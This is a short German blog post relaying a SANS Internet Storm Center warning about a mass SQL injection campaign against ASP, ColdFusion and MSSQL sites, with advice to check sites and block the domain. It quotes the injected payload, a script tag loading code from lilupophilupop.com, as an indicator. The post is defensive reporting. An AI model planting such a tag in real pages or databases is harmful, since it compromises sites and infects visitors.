Tausende von Webseiten infiziert: Ziele scheinen ASP, IIS und MSSQL zu sein

Kein Kommentar Autor: Jürgen (jdo)

SANS Logo 150x150Uh, das sieht nicht gut aus. Die Jungs vom SANS Internet Storm Center berichten von einer digitalen Seuche, die sich gerade ausbreitet. Man habe etliche Berichte erhalten, dass sich der String “></title><script src=”hXXp://lilupophilupop.com/sl.php”></script> in vielen Webseiten befindet, beziehungsweise sich in diverse Tabellen einträgt.

Kurz nach dem Fund hat Google ungefähr 80 infizierte Seiten ausgeworfen. Später dann 1000 und bei der letzten Suche über 4000. Die Ziele scheinen Seiten mit ASP und Coldfusion zu sein und der Angriff via SQL-Einspeisung scheint auf allen Versionen von MSSQL zu funktionieren.

Die Spuren der Einspeisung führen zu gefälschten Adobe-Flash- oder Fake-AV-Seiten. Überprüft gegebenenfalls Eure Seiten, da die Untersuchung gerade in vollem Gange ist und lilupophilupop sich schnell auszubreiten scheint. Administratoren sollten lilupophilupop am besten komplett blockieren. Schaut in regelmäßigen Abständen auf SANS, weil die ihren Bericht aktualisieren und erweitern. Informiert andere Seitenbetreiber und Administratoren darüber. Selbst wenn man kein ASP, Coldfusion oder MSSQL einsetzt, kann ein Kotrollblick nicht schaden.




 Alle Kommentare als Feed abonnieren

Kommentare sind geschlossen.